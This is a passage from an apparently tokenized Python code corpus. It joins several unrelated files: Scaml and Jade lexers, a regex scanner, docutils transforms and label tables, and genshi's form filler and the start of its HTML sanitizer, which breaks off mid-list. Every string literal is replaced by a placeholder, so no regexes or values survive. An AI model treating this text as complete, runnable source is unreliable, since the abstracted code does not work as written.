Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> } <EOL> class ScamlLexer ( ExtendedRegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> flags = re . IGNORECASE <EOL> _dot = r'<STR_LIT:.>' <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , _indentation ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:root>' ) , <EOL> default ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT:content>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , Name . Namespace , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Comment , Comment . Special , Comment ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT:/>' + _dot + r'<STR_LIT>' , _starts_block ( Comment , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , _starts_block ( Comment . Preproc , <EOL> '<STR_LIT>' ) , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , Keyword , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT::>' + _dot + r'<STR_LIT>' , _starts_block ( Name . 
Decorator , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Variable , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Instance , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Global , '<STR_LIT:#pop>' ) , <EOL> ( r"<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Decorator ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . 
Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> } <EOL> class JadeLexer ( ExtendedRegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> flags = re . IGNORECASE <EOL> _dot = r'<STR_LIT:.>' <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , _indentation ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , '<STR_LIT:root>' ) , <EOL> default ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT:content>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , Name . Namespace , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Comment , Comment . Special , Comment ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT:/>' + _dot + r'<STR_LIT>' , _starts_block ( Comment , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , _starts_block ( Comment . Preproc , <EOL> '<STR_LIT>' ) , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , Keyword , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT::>' + _dot + r'<STR_LIT>' , _starts_block ( Name . Decorator , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . 
Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Variable , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Instance , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Global , '<STR_LIT:#pop>' ) , <EOL> ( r"<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Decorator ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> class EndOfText ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> class Scanner ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , text , flags = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> self . data = text <EOL> self . data_length = len ( text ) <EOL> self . start_pos = <NUM_LIT:0> <EOL> self . pos = <NUM_LIT:0> <EOL> self . flags = flags <EOL> self . last = None <EOL> self . match = None <EOL> self . _re_cache = { } <EOL> def eos ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . pos >= self . data_length <EOL> eos = property ( eos , eos . __doc__ ) <EOL> def check ( self , pattern ) : <EOL> """<STR_LIT>""" <EOL> if self . eos : <EOL> raise EndOfText ( ) <EOL> if pattern not in self . _re_cache : <EOL> self . _re_cache [ pattern ] = re . compile ( pattern , self . flags ) <EOL> return self . _re_cache [ pattern ] . match ( self . data , self . pos ) <EOL> def test ( self , pattern ) : <EOL> """<STR_LIT>""" <EOL> return self . check ( pattern ) is not None <EOL> def scan ( self , pattern ) : <EOL> """<STR_LIT>""" <EOL> if self . eos : <EOL> raise EndOfText ( ) <EOL> if pattern not in self . _re_cache : <EOL> self . _re_cache [ pattern ] = re . compile ( pattern , self . flags ) <EOL> self . last = self . match <EOL> m = self . _re_cache [ pattern ] . match ( self . data , self . pos ) <EOL> if m is None : <EOL> return False <EOL> self . start_pos = m . start ( ) <EOL> self . pos = m . end ( ) <EOL> self . match = m . group ( ) <EOL> return True <EOL> def get_char ( self ) : <EOL> """<STR_LIT>""" <EOL> self . scan ( '<STR_LIT:.>' ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . pos , <EOL> self . data_length <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> from docutils import nodes , utils , languages <EOL> from docutils . transforms import Transform <EOL> class Compound ( Transform ) : <EOL> """<STR_LIT>""" <EOL> default_priority = <NUM_LIT> <EOL> def apply ( self ) : <EOL> for compound in self . document . traverse ( nodes . compound ) : <EOL> first_child = True <EOL> for child in compound : <EOL> if first_child : <EOL> if not isinstance ( child , nodes . Invisible ) : <EOL> first_child = False <EOL> else : <EOL> child [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> compound . replace_self ( compound [ : ] ) <EOL> class Admonitions ( Transform ) : <EOL> """<STR_LIT>""" <EOL> default_priority = <NUM_LIT> <EOL> def apply ( self ) : <EOL> language = languages . get_language ( self . document . settings . language_code , <EOL> self . document . reporter ) <EOL> for node in self . document . traverse ( nodes . Admonition ) : <EOL> node_name = node . __class__ . __name__ <EOL> node [ '<STR_LIT>' ] . append ( node_name ) <EOL> if not isinstance ( node , nodes . admonition ) : <EOL> admonition = nodes . admonition ( node . rawsource , * node . children , <EOL> ** node . attributes ) <EOL> title = nodes . title ( '<STR_LIT>' , language . labels [ node_name ] ) <EOL> admonition . insert ( <NUM_LIT:0> , title ) <EOL> node . replace_self ( admonition ) </s>
<s> """<STR_LIT>""" <EOL> from genshi . filters . html import HTMLFormFiller , HTMLSanitizer <EOL> from genshi . filters . i18n import Translator <EOL> from genshi . filters . transform import Transformer <EOL> __docformat__ = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> labels = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT:date>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> """<STR_LIT>""" <EOL> bibliographic_fields = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:address>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:version>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:status>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> """<STR_LIT>""" <EOL> author_separators = [ '<STR_LIT:;>' , '<STR_LIT:U+002C>' ] <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> directives = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:error>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:image>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:replace>' , <EOL> '<STR_LIT>' : '<STR_LIT:replace>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT:class>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> """<STR_LIT>""" <EOL> roles = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT:index>' : '<STR_LIT:index>' , <EOL> '<STR_LIT:i>' : '<STR_LIT:index>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:t>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:target>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , } <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> any <EOL> except NameError : <EOL> from genshi . util import any <EOL> import re <EOL> from genshi . core import Attrs , QName , stripentities <EOL> from genshi . core import END , START , TEXT , COMMENT <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> __docformat__ = '<STR_LIT>' <EOL> class HTMLFormFiller ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = None , id = None , data = None , passwords = False ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . id = id <EOL> if data is None : <EOL> data = { } <EOL> self . data = data <EOL> self . passwords = passwords <EOL> def __call__ ( self , stream ) : <EOL> """<STR_LIT>""" <EOL> in_form = in_select = in_option = in_textarea = False <EOL> select_value = option_value = textarea_value = None <EOL> option_start = None <EOL> option_text = [ ] <EOL> no_option_value = False <EOL> for kind , data , pos in stream : <EOL> if kind is START : <EOL> tag , attrs = data <EOL> tagname = tag . localname <EOL> if tagname == '<STR_LIT>' and ( <EOL> self . name and attrs . get ( '<STR_LIT:name>' ) == self . name or <EOL> self . id and attrs . get ( '<STR_LIT:id>' ) == self . id or <EOL> not ( self . id or self . name ) ) : <EOL> in_form = True <EOL> elif in_form : <EOL> if tagname == '<STR_LIT:input>' : <EOL> type = attrs . get ( '<STR_LIT:type>' , '<STR_LIT>' ) . lower ( ) <EOL> if type in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name and name in self . data : <EOL> value = self . data [ name ] <EOL> declval = attrs . 
get ( '<STR_LIT:value>' ) <EOL> checked = False <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> if declval is not None : <EOL> checked = declval in [ str ( v ) for v <EOL> in value ] <EOL> else : <EOL> checked = any ( value ) <EOL> else : <EOL> if declval is not None : <EOL> checked = declval == str ( value ) <EOL> elif type == '<STR_LIT>' : <EOL> checked = bool ( value ) <EOL> if checked : <EOL> attrs |= [ ( QName ( '<STR_LIT>' ) , '<STR_LIT>' ) ] <EOL> elif '<STR_LIT>' in attrs : <EOL> attrs -= '<STR_LIT>' <EOL> elif type in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:text>' ) or type == '<STR_LIT:password>' and self . passwords : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name and name in self . data : <EOL> value = self . data [ name ] <EOL> if isinstance ( value , ( list , tuple ) ) : <EOL> value = value [ <NUM_LIT:0> ] <EOL> if value is not None : <EOL> attrs |= [ <EOL> ( QName ( '<STR_LIT:value>' ) , str ( value ) ) <EOL> ] <EOL> elif tagname == '<STR_LIT>' : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name in self . data : <EOL> select_value = self . data [ name ] <EOL> in_select = True <EOL> elif tagname == '<STR_LIT>' : <EOL> name = attrs . get ( '<STR_LIT:name>' ) <EOL> if name in self . data : <EOL> textarea_value = self . data . get ( name ) <EOL> if isinstance ( textarea_value , ( list , tuple ) ) : <EOL> textarea_value = textarea_value [ <NUM_LIT:0> ] <EOL> in_textarea = True <EOL> elif in_select and tagname == '<STR_LIT>' : <EOL> option_start = kind , data , pos <EOL> option_value = attrs . get ( '<STR_LIT:value>' ) <EOL> if option_value is None : <EOL> no_option_value = True <EOL> option_value = '<STR_LIT>' <EOL> in_option = True <EOL> continue <EOL> yield kind , ( tag , attrs ) , pos <EOL> elif in_form and kind is TEXT : <EOL> if in_select and in_option : <EOL> if no_option_value : <EOL> option_value += data <EOL> option_text . 
append ( ( kind , data , pos ) ) <EOL> continue <EOL> elif in_textarea : <EOL> continue <EOL> yield kind , data , pos <EOL> elif in_form and kind is END : <EOL> tagname = data . localname <EOL> if tagname == '<STR_LIT>' : <EOL> in_form = False <EOL> elif tagname == '<STR_LIT>' : <EOL> in_select = False <EOL> select_value = None <EOL> elif in_select and tagname == '<STR_LIT>' : <EOL> if isinstance ( select_value , ( tuple , list ) ) : <EOL> selected = option_value in [ str ( v ) for v <EOL> in select_value ] <EOL> else : <EOL> selected = option_value == str ( select_value ) <EOL> okind , ( tag , attrs ) , opos = option_start <EOL> if selected : <EOL> attrs |= [ ( QName ( '<STR_LIT>' ) , '<STR_LIT>' ) ] <EOL> elif '<STR_LIT>' in attrs : <EOL> attrs -= '<STR_LIT>' <EOL> yield okind , ( tag , attrs ) , opos <EOL> if option_text : <EOL> for event in option_text : <EOL> yield event <EOL> in_option = False <EOL> no_option_value = False <EOL> option_start = option_value = None <EOL> option_text = [ ] <EOL> elif in_textarea and tagname == '<STR_LIT>' : <EOL> if textarea_value : <EOL> yield TEXT , str ( textarea_value ) , pos <EOL> textarea_value = None <EOL> in_textarea = False <EOL> yield kind , data , pos <EOL> else : <EOL> yield kind , data , pos <EOL> class HTMLSanitizer ( object ) : <EOL> """<STR_LIT>""" <EOL> SAFE_TAGS = frozenset ( [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:address>' , '<STR_LIT>' , '<STR_LIT:b>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:code>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:input>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , '<STR_LIT>' , 
'<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:p>' , '<STR_LIT>' , '<STR_LIT:q>' , '<STR_LIT:s>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> SAFE_ATTRS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:class>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:size>' , <EOL> '<STR_LIT>' , '<STR_LIT:src>' , '<STR_LIT:start>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:target>' , '<STR_LIT:title>' , <EOL> '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:value>' , '<STR_LIT>' , '<STR_LIT:width>' ] ) <EOL> SAFE_CSS = frozenset ( [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , 
